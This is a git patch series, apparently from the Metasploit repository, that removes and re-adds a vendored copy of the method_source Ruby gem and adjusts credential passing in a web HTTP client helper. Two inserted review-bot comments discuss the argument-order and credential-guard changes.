- # (This functionality is only supported in Ruby 1.9 and above) - # @return [String] The method's comments as a string - # @example - # Set.instance_method(:clear).comment.display - # => - # # Removes all elements and returns self. - def comment - if respond_to?(:source_location) - comment = MethodSource.comment_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !comment - else - raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" - end - - comment - end - end -end - -class Method - include MethodSource::SourceLocation::MethodExtensions - include MethodSource::MethodExtensions -end - -class UnboundMethod - include MethodSource::SourceLocation::UnboundMethodExtensions - include MethodSource::MethodExtensions -end - -class Proc - include MethodSource::SourceLocation::ProcExtensions - include MethodSource::MethodExtensions -end - diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb deleted file mode 100644 index 9161854819..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb +++ /dev/null 
@@ -1,138 +0,0 @@ -module MethodSource - module ReeSourceLocation - # Ruby enterprise edition provides all the information that's - # needed, in a slightly different way. - def source_location - [__file__, __line__] rescue nil - end - end - - module SourceLocation - module MethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - else - - - def trace_func(event, file, line, id, binding, classname) - return unless event == 'call' - set_trace_func nil - - @file, @line = file, line - raise :found - end - - private :trace_func - - # Return the source location of a method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - if @file.nil? - args =[*(1..(arity<-1 ? -arity-1 : arity ))] - - set_trace_func method(:trace_func).to_proc - call(*args) rescue nil - set_trace_func nil - @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) - end - return [@file, @line] if File.exist?(@file.to_s) - end - end - end - - module ProcExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ - - # Return the source location for a Proc (Rubinius only) - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - [block.file.to_s, block.line] - end - else - - # Return the source location for a Proc (in implementations - # without Proc#source_location) - # @return [Array] A two element array. 
First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - self.to_s =~ /@(.*):(\d+)/ - [$1, $2.to_i] - end - end - end - - module UnboundMethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - - else - - - # Return the source location of an instance method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - klass = case owner - when Class - owner - when Module - method_owner = owner - Class.new { include(method_owner) } - end - - # deal with immediate values - case - when klass == Symbol - return :a.method(name).source_location - when klass == Fixnum - return 0.method(name).source_location - when klass == TrueClass - return true.method(name).source_location - when klass == FalseClass - return false.method(name).source_location - when klass == NilClass - return nil.method(name).source_location - end - - begin - Object.instance_method(:method).bind(klass.allocate).call(name).source_location - rescue TypeError - - # Assume we are dealing with a Singleton Class: - # 1. Get the instance object - # 2. Forward the source_location lookup to the instance - instance ||= ObjectSpace.each_object(owner).first - Object.instance_method(:method).bind(instance).call(name).source_location - end - end - end - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb deleted file mode 100644 index b8142bfaef..0000000000 
--- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb +++ /dev/null @@ -1,3 +0,0 @@ -module MethodSource - VERSION = "0.7.1" -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec deleted file mode 100644 index 83a727d6f6..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec +++ /dev/null @@ -1,33 +0,0 @@ -# -*- encoding: utf-8 -*- - -Gem::Specification.new do |s| - s.name = "method_source" - s.version = "0.7.0" - - s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= - s.authors = ["John Mair (banisterfiend)"] - s.date = "2012-01-01" - s.description = "retrieve the sourcecode for a method" - s.email = "jrmair@gmail.com" - s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"] - s.homepage = "http://banisterfiend.wordpress.com" - s.require_paths = ["lib"] - s.rubygems_version = "1.8.10" - s.summary = "retrieve the sourcecode for a method" - s.test_files = ["test/test.rb", "test/test_helper.rb"] - - if s.respond_to? :specification_version then - s.specification_version = 3 - - if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then - s.add_development_dependency(%q, ["~> 1.1.0"]) - s.add_development_dependency(%q, ["~> 0.9"]) - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb deleted file mode 100644 index 425e56acf9..0000000000 
--- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb
+++ /dev/null
@@ -1,122 +0,0 @@ -direc = File.dirname(__FILE__) - -require 'rubygems' -require 'bacon' -require "#{direc}/../lib/method_source" -require "#{direc}/test_helper" - -describe MethodSource do - - describe "source_location (testing 1.8 implementation)" do - it 'should return correct source_location for a method' do - method(:hello).source_location.first.should =~ /test_helper/ - end - - it 'should not raise for immediate instance methods' do - [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| - lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise - end - end - - it 'should not raise for immediate methods' do - [:a, 1, true, false, nil].each do |immediate| - lambda { immediate.method(:to_s).source_location }.should.not.raise - end - end - end - - before do - @hello_module_source = " def hello; :hello_module; end\n" - @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" - @hello_source = "def hello; :hello; end\n" - @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" - @lambda_comment = "# This is a comment for MyLambda\n" - @lambda_source = "MyLambda = lambda { :lambda }\n" - @proc_source = "MyProc = Proc.new { :proc }\n" - end - - it 'should define methods on Method and UnboundMethod and Proc' do - Method.method_defined?(:source).should == true - UnboundMethod.method_defined?(:source).should == true - Proc.method_defined?(:source).should == true - end - - describe "Methods" do - it 'should return source for method' do - method(:hello).source.should == @hello_source - end - - it 'should return source for a method defined in a module' do - M.instance_method(:hello).source.should == @hello_module_source - end - - it 'should return source for a singleton method as an instance method' do - class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source - end - - it 'should return source for a singleton method' do - 
$o.method(:hello).source.should == @hello_singleton_source - end - - - it 'should return a comment for method' do - method(:hello).comment.should == @hello_comment - end - - - if !is_rbx? - it 'should raise for C methods' do - lambda { method(:puts).source }.should.raise RuntimeError - end - end - end - - # if RUBY_VERSION =~ /1.9/ || is_rbx? - describe "Lambdas and Procs" do - it 'should return source for proc' do - MyProc.source.should == @proc_source - end - - it 'should return an empty string if there is no comment' do - MyProc.comment.should == '' - end - - it 'should return source for lambda' do - MyLambda.source.should == @lambda_source - end - - it 'should return comment for lambda' do - MyLambda.comment.should == @lambda_comment - end - end - # end - describe "Comment tests" do - before do - @comment1 = "# a\n# b\n" - @comment2 = "# a\n# b\n" - @comment3 = "# a\n#\n# b\n" - @comment4 = "# a\n# b\n" - @comment5 = "# a\n# b\n# c\n# d\n" - end - - it "should correctly extract multi-line comments" do - method(:comment_test1).comment.should == @comment1 - end - - it "should correctly strip leading whitespace before comments" do - method(:comment_test2).comment.should == @comment2 - end - - it "should keep empty comment lines" do - method(:comment_test3).comment.should == @comment3 - end - - it "should ignore blank lines between comments" do - method(:comment_test4).comment.should == @comment4 - end - - it "should align all comments to same indent level" do - method(:comment_test5).comment.should == @comment5 - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb deleted file mode 100644 index 53da4e519c..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb +++ /dev/null 
@@ -1,50 +0,0 @@ -def is_rbx? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ -end - -def jruby? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ -end - - -module M - def hello; :hello_module; end -end - -$o = Object.new -def $o.hello; :hello_singleton; end - -# A comment for hello - - # It spans two lines and is indented by 2 spaces -def hello; :hello; end - -# a -# b -def comment_test1; end - - # a - # b -def comment_test2; end - -# a -# -# b -def comment_test3; end - -# a - -# b -def comment_test4; end - - -# a - # b - # c -# d -def comment_test5; end - -# This is a comment for MyLambda -MyLambda = lambda { :lambda } -MyProc = Proc.new { :proc } - diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 2ad3dbcb19..00ee6c1e5b 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -107,6 +107,7 @@ class Auxiliary::Web::HTTP {}, opts[:target].ssl, 'SSLv23', + nil, username, password ) @@ -299,10 +300,8 @@ class Auxiliary::Web::HTTP opts['data'] = body if body c = connect - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end + c.username = username + c.password = password Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out From 1407886e83a5427388f3c8046337df0bfea85fd7 Mon Sep 17 00:00:00 2001 
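Review bot: The bare `nil` added between `'SSLv23'` and `username` in the `@@ -107,6 +107,7 @@` hunk is an unexplained positional argument, and it moves the credentials one slot further along the argument list. A trailing comment naming the parameter it fills, for example `nil, # <parameter name>: unused here`, would let a reader confirm that `username` and `password` still land in the intended positions. The call opens outside the hunk, so the callee and its signature are not visible here; if the signature on this branch does not have the extra slot, the credentials would be bound to other options without any error being raised.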
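Review bot: In the `@@ -299,10 +300,8 @@` hunk, `c.username = username` and `c.password = password` now run on every request, so a caller's per-request `opts['username']` / `opts['password']` are ignored without notice and the old empty-string guard and `.to_s` coercion are gone. If `username` can be nil or empty (its definition is not visible here), the client is handed that value where it previously was left untouched; `c.username, c.password = username.to_s, password.to_s unless username.to_s.empty?` keeps the earlier guard on the new source. A one-line comment stating that credentials are taken from the instance and not from `opts` would also make the behaviour change explicit to callers. The enclosing method starts and ends outside the hunk.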
From: David Maloney Date: Tue, 5 Mar 2013 12:34:51 -0600 Subject: [PATCH 78/87] Revert "fix a major typo snaffu" This reverts commit c639de7ccc2806110e30530aec1a689a8b293964. --- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 ++ .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 + .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 + .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 +++ .../gems/method_source-0.7.1/README.markdown | 91 ++++++++++ .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 ++++++++ .../method_source-0.7.1/lib/method_source.rb | 163 ++++++++++++++++++ .../lib/method_source/source_location.rb | 138 +++++++++++++++ .../lib/method_source/version.rb | 3 + .../method_source-0.7.1/method_source.gemspec | 33 ++++ .../gems/method_source-0.7.1/test/test.rb | 122 +++++++++++++ .../method_source-0.7.1/test/test_helper.rb | 50 ++++++ lib/msf/core/auxiliary/web/http.rb | 7 +- 14 files changed, 725 insertions(+), 3 deletions(-) create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb 
create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest
new file mode 100644
index 0000000000..e69de29bb2
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml
new file mode 100644
index 0000000000..ba51bba6b2
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml
@@ -0,0 +1,17 @@
+rvm:
+ - 1.8.7
+ - 1.9.2
+ - 1.9.3
+ - ree
+ - rbx-18mode
+ - rbx-19mode
+ - jruby
+
+notifications:
+ irc: "irc.freenode.org#pry"
+ recipients:
+ - jrmair@gmail.com
+
+branches:
+ only:
+ - master
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts
new file mode 100644
index 0000000000..a4e7838016
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts
@@ -0,0 +1 @@
+-m markdown
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile
new file mode 100644
index 0000000000..e45e65f871
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile
@@ -0,0 +1,2 @@
+source :rubygems
+gemspec
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE
new file mode 100644
index 0000000000..d1a50d62d0
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE
@@ -0,0 +1,25 @@
+License
+-------
+
+(The MIT License)
+
+Copyright (c) 2011 John Mair (banisterfiend)
+
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+'Software'), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
+CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
+TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
+SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown
new file mode 100644
index 0000000000..d91b810a3b
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown
@@ -0,0 +1,91 @@ +method_source +============= + +(C) John Mair (banisterfiend) 2011 + +_retrieve the sourcecode for a method_ + +*NOTE:* This simply utilizes `Method#source_location`; it + does not access the live AST. + +`method_source` is a utility to return a method's sourcecode as a +Ruby string. Also returns `Proc` and `Lambda` sourcecode. + +Method comments can also be extracted using the `comment` method. + +It is written in pure Ruby (no C). + +* Some Ruby 1.8 support now available. +* Support for MRI, RBX, JRuby, REE + +`method_source` provides the `source` and `comment` methods to the `Method` and +`UnboundMethod` and `Proc` classes. + +* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` +* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) +* See the [source code](http://github.com/banister/method_source) + +Example: display method source +------------------------------ + + Set.instance_method(:merge).source.display + # => + def merge(enum) + if enum.instance_of?(self.class) + @hash.update(enum.instance_variable_get(:@hash)) + else + do_with_enum(enum) { |o| add(o) } + end + + self + end + +Example: display method comments +-------------------------------- + + Set.instance_method(:merge).comment.display + # => + # Merges the elements of the given enumerable object to the set and + # returns self. + +Limitations: +------------ + +* Occasional strange behaviour in Ruby 1.8 +* Cannot return source for C methods. +* Cannot return source for dynamically defined methods. + +Special Thanks +-------------- + +[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. + +[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. + +[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. 
+ +License +------- + +(The MIT License) + +Copyright (c) 2011 John Mair (banisterfiend) + +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +'Software'), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile new file mode 100644 index 0000000000..92c0234f3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile 
@@ -0,0 +1,76 @@ +dlext = Config::CONFIG['DLEXT'] +direc = File.dirname(__FILE__) + +require 'rake/clean' +require 'rake/gempackagetask' +require "#{direc}/lib/method_source/version" + +CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") +CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", + "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", + "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") + +def apply_spec_defaults(s) + s.name = "method_source" + s.summary = "retrieve the sourcecode for a method" + s.version = MethodSource::VERSION + s.date = Time.now.strftime '%Y-%m-%d' + s.author = "John Mair (banisterfiend)" + s.email = 'jrmair@gmail.com' + s.description = s.summary + s.require_path = 'lib' + + s.add_development_dependency("bacon","~>1.1.0") + s.add_development_dependency("rake", "~>0.9") + s.homepage = "http://banisterfiend.wordpress.com" + s.has_rdoc = 'yard' + s.files = `git ls-files`.split("\n") + s.test_files = `git ls-files -- test/*`.split("\n") +end + +task :test do + sh "bacon -q #{direc}/test/test.rb" +end + +desc "reinstall gem" +task :reinstall => :gems do + sh "gem uninstall method_source" rescue nil + sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" +end + +desc "Set up and run tests" +task :default => [:test] + +namespace :ruby do + spec = Gem::Specification.new do |s| + apply_spec_defaults(s) + s.platform = Gem::Platform::RUBY + end + + Rake::GemPackageTask.new(spec) do |pkg| + pkg.need_zip = false + pkg.need_tar = false + end + + desc "Generate gemspec file" + task :gemspec do + File.open("#{spec.name}.gemspec", "w") do |f| + f << spec.to_ruby + end + end +end + +desc "build all platform gems at once" +task :gems => [:rmgems, "ruby:gem"] + +desc "remove all platform gems" +task :rmgems => ["ruby:clobber_package"] + +desc "build and push latest gems" +task :pushgems => :gems do + chdir("#{direc}/pkg") do + Dir["*.gem"].each do |gemfile| + sh "gem push #{gemfile}" 
+ end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb new file mode 100644 index 0000000000..9a3c325f75 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb 
@@ -0,0 +1,163 @@ +# (C) John Mair (banisterfiend) 2011 +# MIT License + +direc = File.dirname(__FILE__) + +require "#{direc}/method_source/version" +require "#{direc}/method_source/source_location" + +module MethodSource + # Determine if a string of code is a valid Ruby expression. + # @param [String] code The code to validate. + # @return [Boolean] Whether or not the code is a valid Ruby expression. + # @example + # valid_expression?("class Hello") #=> false + # valid_expression?("class Hello; end") #=> true + def self.valid_expression?(str) + if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ + Rubinius::Melbourne19.parse_string(str) + elsif defined?(Rubinius::Melbourne) + Rubinius::Melbourne.parse_string(str) + else + catch(:valid) { + eval("BEGIN{throw :valid}\n#{str}") + } + end + true + rescue SyntaxError + false + end + + # Helper method responsible for extracting method body. + # Defined here to avoid polluting `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [File] The opened source file + def self.source_helper(source_location) + return nil if !source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + (line - 1).times { file.readline } + + code = "" + loop do + val = file.readline + code << val + + return code if valid_expression?(code) + end + end + end + + # Helper method responsible for opening source file and buffering up + # the comments for a specified method. Defined here to avoid polluting + # `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [String] The comments up to the point of the method. 
+ def self.comment_helper(source_location) + return nil if !source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + buffer = "" + (line - 1).times do + line = file.readline + # Add any line that is a valid ruby comment, + # but clear as soon as we hit a non comment line. + if (line =~ /^\s*#/) || (line =~ /^\s*$/) + buffer << line.lstrip + else + buffer.replace("") + end + end + + buffer + end + end + + # This module is to be included by `Method` and `UnboundMethod` and + # provides the `#source` functionality + module MethodExtensions + + # We use the included hook to patch Method#source on rubinius. + # We need to use the included hook as Rubinius defines a `source` + # on Method so including a module will have no effect (as it's + # higher up the MRO). + # @param [Class] klass The class that includes the module. + def self.included(klass) + if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && + RUBY_ENGINE =~ /rbx/ + + klass.class_eval do + orig_source = instance_method(:source) + + define_method(:source) do + begin + super + rescue + orig_source.bind(self).call + end + end + + end + end + end + + # Return the sourcecode for the method as a string + # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method sourcecode as a string + # @example + # Set.instance_method(:clear).source.display + # => + # def clear + # @hash.clear + # self + # end + def source + if respond_to?(:source_location) + source = MethodSource.source_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !source + else + raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" + end + + source + end + + # Return the comments associated with the method as a string. 
+ # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method's comments as a string + # @example + # Set.instance_method(:clear).comment.display + # => + # # Removes all elements and returns self. + def comment + if respond_to?(:source_location) + comment = MethodSource.comment_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !comment + else + raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" + end + + comment + end + end +end + +class Method + include MethodSource::SourceLocation::MethodExtensions + include MethodSource::MethodExtensions +end + +class UnboundMethod + include MethodSource::SourceLocation::UnboundMethodExtensions + include MethodSource::MethodExtensions +end + +class Proc + include MethodSource::SourceLocation::ProcExtensions + include MethodSource::MethodExtensions +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb new file mode 100644 index 0000000000..9161854819 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb 
@@ -0,0 +1,138 @@ +module MethodSource + module ReeSourceLocation + # Ruby enterprise edition provides all the information that's + # needed, in a slightly different way. + def source_location + [__file__, __line__] rescue nil + end + end + + module SourceLocation + module MethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + else + + + def trace_func(event, file, line, id, binding, classname) + return unless event == 'call' + set_trace_func nil + + @file, @line = file, line + raise :found + end + + private :trace_func + + # Return the source location of a method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + if @file.nil? + args =[*(1..(arity<-1 ? -arity-1 : arity ))] + + set_trace_func method(:trace_func).to_proc + call(*args) rescue nil + set_trace_func nil + @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) + end + return [@file, @line] if File.exist?(@file.to_s) + end + end + end + + module ProcExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ + + # Return the source location for a Proc (Rubinius only) + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + [block.file.to_s, block.line] + end + else + + # Return the source location for a Proc (in implementations + # without Proc#source_location) + # @return [Array] A two element array. 
First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + self.to_s =~ /@(.*):(\d+)/ + [$1, $2.to_i] + end + end + end + + module UnboundMethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + + else + + + # Return the source location of an instance method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + klass = case owner + when Class + owner + when Module + method_owner = owner + Class.new { include(method_owner) } + end + + # deal with immediate values + case + when klass == Symbol + return :a.method(name).source_location + when klass == Fixnum + return 0.method(name).source_location + when klass == TrueClass + return true.method(name).source_location + when klass == FalseClass + return false.method(name).source_location + when klass == NilClass + return nil.method(name).source_location + end + + begin + Object.instance_method(:method).bind(klass.allocate).call(name).source_location + rescue TypeError + + # Assume we are dealing with a Singleton Class: + # 1. Get the instance object + # 2. Forward the source_location lookup to the instance + instance ||= ObjectSpace.each_object(owner).first + Object.instance_method(:method).bind(instance).call(name).source_location + end + end + end + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb new file mode 100644 index 0000000000..b8142bfaef --- /dev/null 
+++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb @@ -0,0 +1,3 @@ +module MethodSource + VERSION = "0.7.1" +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec new file mode 100644 index 0000000000..83a727d6f6 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec @@ -0,0 +1,33 @@ +# -*- encoding: utf-8 -*- + +Gem::Specification.new do |s| + s.name = "method_source" + s.version = "0.7.0" + + s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= + s.authors = ["John Mair (banisterfiend)"] + s.date = "2012-01-01" + s.description = "retrieve the sourcecode for a method" + s.email = "jrmair@gmail.com" + s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"] + s.homepage = "http://banisterfiend.wordpress.com" + s.require_paths = ["lib"] + s.rubygems_version = "1.8.10" + s.summary = "retrieve the sourcecode for a method" + 